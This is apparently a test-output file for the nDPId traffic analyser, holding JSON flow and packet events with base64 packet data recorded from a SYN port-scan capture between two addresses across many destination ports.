-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsXIoAADgGs+isEAAIQA2GNIzTCo3dU4MZAAAAAGACBAAp\/wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"synscan.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsG+YAACwGAI2sEAAIQA2GNIzTBRTdU4MZAAAAAGACBAAveAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058156,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1278275058156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058156,"pkt":"ACYLMQczACWzv5HuCABFAAAsNr8AACkG6LOsEAAIQA2GNIzTBDPdU4MZAAAAAGACCAAsWQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs4koAACcGPyisEAAIQA2GNIzTI47dU4MZAAAAAGACEAAE\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"synscan.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs28oAADsGMaisEAAIQA2GNIzTBRDdU4MZAAAAAGACEAAjfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsncwAAC0GfaasEAAIQA2GNIzTE+3dU4MZAAAAAGACCAAcnwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnGIAACgGhBCsEAAIQA2GNIzTABjdU4MZAAAAAGACBAA0dAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs8\/oAACkGK3isEAAIQA2GNIzTznDdU4MZAAAAAGACCABiGwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"synscan.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsbGUAAC4Grg2sEAAIQA2GNIzTOpzdU4MZAAAAAGACDADx7wAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AACsGFySsEAAIQA2GNIzTACDdU4MZAAAAAGACEAAobAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsNgIAAC8G43CsEAAIQA2GNIzTKYLdU4MZAAAAAGACEAD\/CQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsFUwAACgGCyesEAAIQA2GNIzTBADdU4MZAAAAAGACBAAwjAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"synscan.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsZxkAADgGqVmsEAAIQA2GNIzTFr7dU4MZAAAAAGACBAAdzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsnUIAACUGhjCsEAAIQA2GNIzTHCDdU4MZAAAAAGACCAAUbAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"synscan.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jAAACkGTUKsEAAIQA2GNIzTBKPdU4MZAAAAAGACCAAr6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058220,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"synscan.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058220,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmUAAC8Gmw2sEAAIQA2GNIzTDAXdU4MZAAAAAGACEAAchwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs9zUAADUGHD2sEAAIQA2GNIzTDvLdU4MZAAAAAGACCAAhmgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsQXsAACUG4fesEAAIQA2GNIzTIGPdU4MZAAAAAGACCAAQKQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"synscan.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACUGL5usEAAIQA2GNIzSF0fdUoMYAAAAAGACCAAZSAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsbN4AADkGopSsEAAIQA2GNIzSAandUoMYAAAAAGACCAAu5gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"synscan.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdAAADQG+qKsEAAIQA2GNIzSJRzdUoMYAAAAAGACBAAPcwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"synscan.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTDsAADYGxjesEAAIQA2GNIzSNrDdUoMYAAAAAGACDAD13gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ98AACUGu5OsEAAIQA2GNIzSPSzdUoMYAAAAAGACCADzYgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"synscan.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsnPQAADQGd36sEAAIQA2GNIzSNJDdUoMYAAAAAGACBAD\/\/gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs3OIAACsGQJCsEAAIQA2GNIzSBDHdUoMYAAAAAGACEAAkXgAAAgQFtA=="} 